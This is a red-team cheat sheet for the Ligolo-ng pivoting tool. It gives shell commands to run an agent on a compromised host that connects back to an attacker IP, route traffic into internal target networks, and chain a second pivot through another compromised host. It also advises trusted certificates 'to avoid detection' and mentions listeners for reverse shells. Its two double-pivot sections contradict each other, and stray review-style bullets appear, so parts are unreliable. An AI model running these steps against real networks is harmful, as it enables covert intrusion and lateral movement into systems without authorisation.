ligolo-ng

Steps

1. Agent Acquisition

• Download the correct Ligolo-ng agent binary for the compromised host's OS from the official GitHub releases.

• Transfer the agent binary to the compromised host.

2. Proxy Initialization (Attacker Machine)

Create TUN Interface:

sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up

Start Ligolo-proxy:

• Lab Environment (Self-Signed):

ligolo-proxy -selfcert

• Production/Realistic Test (Trusted CA):

ligolo-proxy -certfile <cert.pem> -keyfile <key.pem>

(Replace <cert.pem> and <key.pem> with your certificate and key file paths.)

3. Agent Connection (Compromised Host)

Execute Agent:

./agent -connect <Attacker_IP>:11601 -ignore-cert

(Use -ignore-cert ONLY with self-signed certificates. Replace <Attacker_IP> with your attacker machine's IP.)

4. Tunnel Establishment (Attacker Machine)

Ligolo-proxy Session:

• Use the Ligolo-proxy command-line interface to select the active agent session. Routing Configuration:

sudo ip route add <Target_Network_CIDR> dev ligolo

(Replace <Target_Network_CIDR> with the target network's CIDR notation, e.g., 192.168.1.0/24.) Start Tunnel:

• Within the Ligolo-proxy session, type:

start

5. Verification and Usage (Attacker Machine)

• Use tools like Nmap, Metasploit, or any other network tool to interact with the target network as if you were directly connected.

6. Advanced (Double Pivoting)

Second TUN:

sudo ip tuntap add user $USER mode tun ligolo-double
sudo ip link set ligolo-double up

Listener Forwarding:

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

Second Agent:

• Execute the agent on the next compromised host, connecting to the first compromised host's forwarded port. Second Route:

sudo ip route add <Second_Target_Network_CIDR> dev ligolo-double

---

🔐 Key Considerations

• Certificates: Use trusted certificates for real-world scenarios to avoid detection.

• Listeners: Ensure proper listeners are set for reverse shells and file transfers.

• Routing: Verify correct routing configurations to avoid connectivity issues.

• Environment Variables: Using $USER makes the TUN interface creation more portable.

• CIDR Notation: Recommends using CIDR notation for network routes, which is standard practice.

• Safety: Clearly explains when to use the -ignore-cert flag.

6. Advanced (Double Pivoting – Ligolo-NG)

Ligolo-NG supports multi-hop pivoting natively.

Process:

• First compromised host runs Ligolo agent and exposes internal routes.

• A second internal host is compromised through the first pivot.

• The Ligolo agent is executed on the second host.

• Both agents connect to the same Ligolo proxy.

• Additional routes are added or discovered via autoroute.

No additional TUN interfaces or listener forwarding is required.